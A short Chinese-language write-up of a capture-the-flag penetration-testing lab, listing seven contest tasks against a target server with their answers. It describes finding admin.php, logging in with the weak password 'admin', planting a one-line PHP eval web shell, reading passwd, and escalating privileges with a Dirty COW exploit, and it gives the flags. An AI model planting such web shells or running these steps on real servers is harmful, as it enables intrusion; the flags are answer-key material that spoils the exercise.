需要环境私信发联系方式
1.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将后台管理
员 登 陆 的 地 址 作 为 Flag 提 交 ; ( IP 地 址 用 0.0.0.0 代 替 例 如 :
flag:http://0.0.0.0/admin.php
扫描靶机目录发现后台地址 admin.php
2.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将后台管理 员的密码作为 Flag 提交;
Flag:admin
弱密码admin成功登录
3.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,获取到相应 的权限,使用相关命令获取到当前系统用户 id 为 69 的用户,将该用户的用户名 称作为 Flag 进行提交;
Flag: vcsa
在指定位置找到写入php代码位置
写入一句话木马
<?php @eval($_POST[pass]);?>
同上的方法执行
用蚁键或者网页命令执行查看passwd所有用户的命令 命令执行之后发现admin用户和id为69用户
4.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,获取到相应 的权限,使用 whoami 命令获取当前用户,将获取到的用户作为 Flag 提交;
Flag:apache
5. 通过PC中的渗透测试平台Kali对服务器场景进行渗透测试,获取到相应的权限,将/var/www目录下的图片文件内容作为Flag提交;
Flag: security
6. 通过PC中的渗透测试平台Kali对服务器场景进行渗透测试,找到靶机内的脏牛漏洞提权文件,将文件名作为Flag提交;
Flag: dirty
尝试弱密码123456登录admin用户 用藏牛提权firefart
7.提权之后登陆靶机,进入靶机的/root 目录将 root 目录的 flag.txt 文件 的内容作为 Flag 提交
Flag: c4ca4238a0b923820dcc509a6f75849b